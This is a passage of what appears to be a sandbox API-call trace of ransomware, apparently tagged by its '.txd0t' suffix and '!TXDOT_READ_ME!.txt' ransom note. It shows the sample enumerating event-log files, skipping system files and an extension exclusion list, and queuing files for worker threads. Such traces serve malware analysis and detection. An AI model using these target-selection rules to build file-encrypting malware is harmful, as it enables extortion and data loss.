(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.916] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0087.926] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.926] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" [0087.926] SetEvent (hEvent=0x418) returned 1 [0087.926] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cAlternateFileName="MI8196~1.EVT")) returned 1 [0087.926] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2=".") returned 1 [0087.926] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="..") returned 1 [0087.926] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.926] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.926] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" [0087.926] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned=".evtx" [0087.926] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.926] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="bootsect.bak") returned 1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="iconcache.db") returned 1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="thumbs.db") returned -1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2=" ransomware ") returned 1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2=" ransom ") returned 1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="debug.txt") returned 1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="boot.ini") returned 1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="desktop.ini") returned 1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="autorun.inf") returned 1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="ntuser.dat") returned -1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="ntldr") returned -1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="ntdetect.com") returned -1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="bootfont.bin") returned 1 [0087.927] StrCmpIW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.927] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned=".evtx" [0087.927] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.927] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0087.936] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.937] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" [0087.937] SetEvent (hEvent=0x408) returned 1 [0087.937] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cAlternateFileName="MIE36C~1.EVT")) returned 1 [0087.937] StrCmpW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2=".") returned 1 [0087.937] StrCmpW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="..") returned 1 [0087.937] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.937] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.937] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" [0087.937] PathFindExtensionW (pszPath="Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned=".evtx" [0087.937] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="bootsect.bak") returned 1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="iconcache.db") returned 1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="thumbs.db") returned -1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2=" ransomware ") returned 1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2=" ransom ") returned 1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="debug.txt") returned 1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="boot.ini") returned 1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="desktop.ini") returned 1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="autorun.inf") returned 1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="ntuser.dat") returned -1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="ntldr") returned -1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="ntdetect.com") returned -1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="bootfont.bin") returned 1 [0087.937] StrCmpIW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.937] PathFindExtensionW (pszPath="Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned=".evtx" [0087.937] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.937] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0087.941] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.941] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" [0087.941] SetEvent (hEvent=0x418) returned 1 [0087.941] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppReadiness%4Admin.evtx", cAlternateFileName="MIC5CB~1.EVT")) returned 1 [0087.941] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2=".") returned 1 [0087.941] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="..") returned 1 [0087.941] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.941] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.941] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppReadiness%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" [0087.941] PathFindExtensionW (pszPath="Microsoft-Windows-AppReadiness%4Admin.evtx") returned=".evtx" [0087.941] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.941] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="bootsect.bak") returned 1 [0087.941] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="iconcache.db") returned 1 [0087.941] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="thumbs.db") returned -1 [0087.941] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2=" ransomware ") returned 1 [0087.941] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2=" ransom ") returned 1 [0087.941] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="debug.txt") returned 1 [0087.941] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="boot.ini") returned 1 [0087.941] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="desktop.ini") returned 1 [0087.941] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="autorun.inf") returned 1 [0087.941] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="ntuser.dat") returned -1 [0087.941] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="ntldr") returned -1 [0087.941] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="ntdetect.com") returned -1 [0087.942] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="bootfont.bin") returned 1 [0087.942] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.942] PathFindExtensionW (pszPath="Microsoft-Windows-AppReadiness%4Admin.evtx") returned=".evtx" [0087.942] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.942] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0087.955] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.955] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" [0087.955] SetEvent (hEvent=0x408) returned 1 [0087.955] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38c5212, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd38c5212, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppReadiness%4Operational.evtx", cAlternateFileName="MIF8AA~1.EVT")) returned 1 [0087.955] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2=".") returned 1 [0087.955] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="..") returned 1 [0087.955] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.955] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.955] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppReadiness%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" [0087.955] PathFindExtensionW (pszPath="Microsoft-Windows-AppReadiness%4Operational.evtx") returned=".evtx" [0087.955] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.955] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="bootsect.bak") returned 1 [0087.955] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="iconcache.db") returned 1 [0087.955] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="thumbs.db") returned -1 [0087.955] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2=" ransomware ") returned 1 [0087.955] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2=" ransom ") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="debug.txt") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="boot.ini") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="desktop.ini") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="autorun.inf") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="ntuser.dat") returned -1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="ntldr") returned -1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="ntdetect.com") returned -1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="bootfont.bin") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.956] PathFindExtensionW (pszPath="Microsoft-Windows-AppReadiness%4Operational.evtx") returned=".evtx" [0087.956] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.956] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0087.956] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0087.956] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" [0087.956] SetEvent (hEvent=0x418) returned 1 [0087.956] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeployment%4Operational.evtx", cAlternateFileName="MI34FE~1.EVT")) returned 1 [0087.956] StrCmpW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2=".") returned 1 [0087.956] StrCmpW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="..") returned 1 [0087.956] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0087.956] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0087.956] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppXDeployment%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" [0087.956] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeployment%4Operational.evtx") returned=".evtx" [0087.956] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="bootsect.bak") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="iconcache.db") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="thumbs.db") returned -1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2=" ransomware ") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2=" ransom ") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="debug.txt") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="boot.ini") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="desktop.ini") returned 1 [0087.956] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="autorun.inf") returned 1 [0087.957] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="ntuser.dat") returned -1 [0087.957] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="ntldr") returned -1 [0087.957] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="ntdetect.com") returned -1 [0087.957] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="bootfont.bin") returned 1 [0087.957] StrCmpIW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0087.957] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeployment%4Operational.evtx") returned=".evtx" [0087.957] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0087.957] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0088.015] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.015] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" [0088.015] SetEvent (hEvent=0x408) returned 1 [0088.015] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x211000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cAlternateFileName="MIA24C~1.EVT")) returned 1 [0088.016] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2=".") returned 1 [0088.016] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="..") returned 1 [0088.016] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.016] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.016] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" [0088.016] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned=".evtx" [0088.017] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2=" ransom ") returned 1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="debug.txt") returned 1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="boot.ini") returned 1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="ntldr") returned -1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.017] StrCmpIW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.017] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned=".evtx" [0088.017] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.017] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0088.023] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.024] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" [0088.024] SetEvent (hEvent=0x418) returned 1 [0088.024] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cAlternateFileName="MIDBEC~1.EVT")) returned 1 [0088.024] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", psz2=".") returned 1 [0088.025] StrCmpW 